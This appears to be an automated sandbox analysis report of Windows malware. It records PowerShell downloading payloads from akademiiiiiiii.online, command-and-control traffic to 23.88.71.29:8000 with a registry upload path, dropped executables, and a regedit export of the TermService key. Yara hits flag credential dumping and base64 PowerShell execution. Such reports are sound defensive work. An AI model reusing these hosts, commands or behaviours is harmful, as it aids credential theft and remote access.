Source: global traffic	HTTP traffic detected: GET /t/6f5b28f567618bb7b48dc18a2b5751f5791a04bac2764be3c8ead50796e3f23dacb85e6f8a1ac315e86009a6c37fef73 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.online
Source: global traffic	HTTP traffic detected: GET /t/7dfed9d6c790d0068121e3be7e2647c45f0e8b505415e6d80e64e63c4ebab118a2e4b6b4f36140f511645c3d908de349 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /t/ff845948ee2ccbda33aaaf13ec873a62227c6cf41dc3cfb4dda00b71e2aef6952e23c58e5a27974bb20ec802124be99a HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /t/7a0e36d8452d554476938e30cd0496a9a4562d83c7a848fbe65b7f7e919bbd3acf746d10e167d6954233a9fb05e9001d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.online
Source: global traffic	HTTP traffic detected: GET /t/50deddaea4c9b7d61413b0607c29d217fb59374de9f6370902e888f276715c81f7bdbec16785b6357d46b2f63cb4eabefc07543b6e01308ce4fa7ff92ceaa0f2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.online
Source: global traffic	HTTP traffic detected: GET /t/46d578f8ebeb0d298af9e0abba20aa6630bf759e378b0ee836f8ea55b25f08ca80e36c8f3c85f8f090ed84d188970ebb9376096bba1965529122fe3306bc0716 HTTP/1.1Host: akademiiiiiiii.online
Source: global traffic	HTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: YoU7CJ8D9UuIg5OcyVAhnQ==Sec-WebSocket-Version: 13

Source: global traffic

DNS traffic detected: DNS query: akademiiiiiiii.online

Source: unknown

HTTP traffic detected: POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d835daa8b68ca03e3a6e91f8afeb39805d8 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: akademiiiiiiii.onlineContent-Length: 177Connection: Keep-Alive

Source: svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://.css
Source: svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://.jpg
Source: myRdpService.exe, 00000023.00000002.25567154956.000001C9E81BF000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000023.00000002.25567154956.000001C9E81AE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://23.88.71.29:8000/
Source: myRdpService.exe, 00000023.00000002.25567154956.000001C9E81AE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://23.88.71.29:8000/api/registry
Source: myRdpService.exe, 00000023.00000002.25567154956.000001C9E81AE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://23.88.71.29:8000/api/registry/upload/11b46eb9cdd81ad4c5875367ee4c05e4pv%
Source: powershell.exe, 00000005.00000002.24402670816.000001C3E083F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.XZ
Source: powershell.exe, 00000002.00000002.24493746588.000002620C978000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.24493746588.000002620C6BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.24493746588.000002620B612000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E0878000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E083F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1D730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online
Source: powershell.exe, 00000002.00000002.24493746588.000002620BEF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595d
Source: powershell.exe, 00000002.00000002.24493746588.000002620B612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d835daa8b6
Source: powershell.exe, 00000002.00000002.24493746588.000002620BF60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.24493746588.000002620C978000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.24493746588.000002620C6BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d836a933a4
Source: powershell.exe, 00000009.00000002.25579447152.000001FA1C23C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83b41f7df
Source: powershell.exe, 00000009.00000002.25579447152.000001FA1C23C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online/3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d83bddbd5f
Source: svczHost.exe, 00000012.00000002.25194511083.0000024F77D0D000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25194511083.0000024F77D61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online/t/46d578f8ebeb0d298af9e0abba20aa6630bf759e378b0ee836f8ea55b25f08ca80e36
Source: powershell.exe, 00000009.00000002.25579447152.000001FA1C23C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online/t/50deddaea4c9b7d61413b0607c29d217fb59374de9f6370902e888f276715c81f7bdb
Source: powershell.exe, 00000002.00000002.24493746588.000002620B612000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.24493746588.000002620B77A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online/t/6f5b28f567618bb7b48dc18a2b5751f5791a04bac2764be3c8ead50796e3f23dacb85
Source: powershell.exe, 00000002.00000002.24493746588.000002620BF60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online/t/7
Source: powershell.exe, 00000009.00000002.25579447152.000001FA1C23C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online/t/7a0e36d8452d554476938e30cd0496a9a4562d83c7a848fbe65b7f7e919bbd3acf746
Source: powershell.exe, 00000002.00000002.24493746588.000002620BF60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online/t/7d6447df5c20714d580dd15f64b91ad8692b42994877a271f4ee11afcc798d63f96e3
Source: powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online/t/7dfed9d6c790d0068121e3be7e2647c45f0e8b505415e6d80e64e63c4ebab118a2e4b
Source: powershell.exe, 00000002.00000002.24493746588.000002620B7C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online/t/897605e002d48fed977a6a5b9d4706b7bbd31df6c8a9bfd969709d2e0e4b69df4f41c
Source: powershell.exe, 00000009.00000002.25579447152.000001FA1BE91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://akademiiiiiiii.online/t/ff845948ee2ccbda33aaaf13ec873a62227c6cf41dc3cfb4dda00b71e2aef6952e23c
Source: powershell.exe, 00000002.00000002.24575988850.00000262233EF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24429818762.000001C3F7CED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25876905938.000001FA34015000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24768726851.00000281EAE12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000002.00000002.24492029062.0000026209347000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24429818762.000001C3F7CE8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25876905938.000001FA33FD7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24762672229.00000281EA11F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000009.00000002.25884234697.000001FA34426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft.c
Source: svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 00000002.00000002.24568420027.000002621B2D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24425740181.000001C3EFC34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E1118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25810451197.000001FA2BF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.00000281814EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24753331338.0000028190072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.24402670816.000001C3E1090000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.24493746588.000002620B48B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz9
Source: powershell.exe, 00000005.00000002.24402670816.000001C3E10BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E1090000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: powershell.exe, 00000005.00000002.24433505356.000001C3F864B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.o
Source: powershell.exe, 00000005.00000002.24433505356.000001C3F864B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.openxmlformatCK
Source: powershell.exe, 00000005.00000002.24433505356.000001C3F864B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.openxmlformats.SJm
Source: powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: svczHost.exe, svczHost.exe, 00000012.00000002.25199911581.00007FF79C665000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exe	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: powershell.exe, 00000009.00000002.25810451197.000001FA2C19E000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25200173352.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000000.24659406837.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
Source: powershell.exe, 00000002.00000002.24493746588.000002620B261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFBC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25810451197.000001FA2C19E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1BE91000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25200173352.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000002.25199911581.00007FF79C665000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000000.24659406837.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, powershell.exe, 00000018.00000002.24675755847.0000028180001000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000005.00000002.24402670816.000001C3E0AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000005.00000002.24402670816.000001C3E1090000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.24493746588.000002620B48B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz9
Source: powershell.exe, 00000005.00000002.24402670816.000001C3E10BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E1090000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: myRdpService.exe	String found in binary or memory: http://www.gstatic.com/generate_204
Source: svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204y
Source: powershell.exe, 00000002.00000002.24583233213.0000026A24D3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000009.00000002.25884234697.000001FA34426000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coB
Source: powershell.exe, 00000002.00000002.24575988850.00000262233EF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24429818762.000001C3F7CED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25876905938.000001FA34015000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24768726851.00000281EAE12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000002.00000002.24581342497.00000262237C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://.VisualCQ
Source: powershell.exe, 00000009.00000002.25810451197.000001FA2C19E000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25200173352.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000002.25199911581.00007FF79C665000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000000.24659406837.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: svczHost.exe, 00000012.00000000.24659406837.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 00000023.00000002.25573285361.00007FF797348000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF797348000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: svczHost.exe, myRdpService.exe	String found in binary or memory: https://aka.ms/nativeaot-c
Source: myRdpService.exe, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: powershell.exe, 00000009.00000002.25810451197.000001FA2C19E000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25195480002.0000024F7C346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25200173352.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000000.24659406837.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF79748C000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: powershell.exe, 00000002.00000002.24493746588.000002620B261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFBC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1BE91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.0000028180001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.24493746588.000002620B48B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://akademiiiiiiii.online
Source: powershell.exe, 00000002.00000002.24493746588.000002620B261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://akademiiiiiiii.online/t/6def67bd58318a59383bb069395b497b13b1ee3bc393b8cf83656c4cd7d23351
Source: powershell.exe, 00000002.00000002.24493746588.000002620B48B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://akademiiiiiiii.online/t/6def67bd58318a59383bb069395b497b13b1ee3bc393b8cf83656c4cd7d23351Xz9
Source: powershell.exe, 00000018.00000002.24753331338.0000028190072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.24753331338.0000028190072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.24753331338.0000028190072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svczHost.exe, 00000012.00000002.25195480002.0000024F7BA48000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000023.00000002.25573285361.00007FF797348000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF797348000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://github.com/MartinKuschnik/WmiLight
Source: powershell.exe, 00000005.00000002.24402670816.000001C3E1090000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.24493746588.000002620B48B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3DFE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25579447152.000001FA1C04A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818022B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/PesterXz9
Source: powershell.exe, 00000005.00000002.24402670816.000001C3E10BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E1090000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 00000009.00000002.25810451197.000001FA2C19E000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25195480002.0000024F7BA48000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000012.00000002.25200173352.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000012.00000000.24659406837.00007FF79C789000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 00000023.00000002.25573285361.00007FF797348000.00000002.00000001.01000000.0000000A.sdmp, myRdpService.exe, 00000023.00000000.24874277373.00007FF797348000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://github.com/dotnet/runtime
Source: powershell.exe, 00000005.00000002.24402670816.000001C3E0AE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E09EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.0000028181056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.000002818127C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.0000028180BD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.24568420027.000002621B2D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24425740181.000001C3EFC34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24402670816.000001C3E1118000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25810451197.000001FA2BF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24675755847.00000281814EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24753331338.0000028190072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.24575988850.00000262233EF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.24429818762.000001C3F7CED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.25876905938.000001FA34015000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.24768726851.00000281EAE12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000005.00000002.24402670816.000001C3E0AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org

Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749

Source: unknown

HTTPS traffic detected: 104.21.93.157:443 -> 192.168.11.20:49749 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Malicious sample detected (through community Yara rule)

Source: 35.2.myRdpService.exe.7ff796c80000.0.unpack, type: UNPACKEDPE	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
Source: 00000023.00000002.25572623962.00007FF797186000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
Source: Process Memory Space: powershell.exe PID: 4012, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5520, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: svczHost.exe PID: 8876, type: MEMORYSTR	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
Source: Process Memory Space: myRdpService.exe PID: 4280, type: MEMORYSTR	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Temp\svczHost.exe

Jump to dropped file

Uses regedit.exe to modify the Windows registry

Source: C:\Windows\Temp\myRdpService.exe

Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 6%

Source: C:\Windows\System32\sppsvc.exe

File created: C:\Windows\System32\spp\store\2.0\data.dat.tmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\file

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFBBA2E5690	2_2_00007FFBBA2E5690
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFBBA2EF10D	9_2_00007FFBBA2EF10D
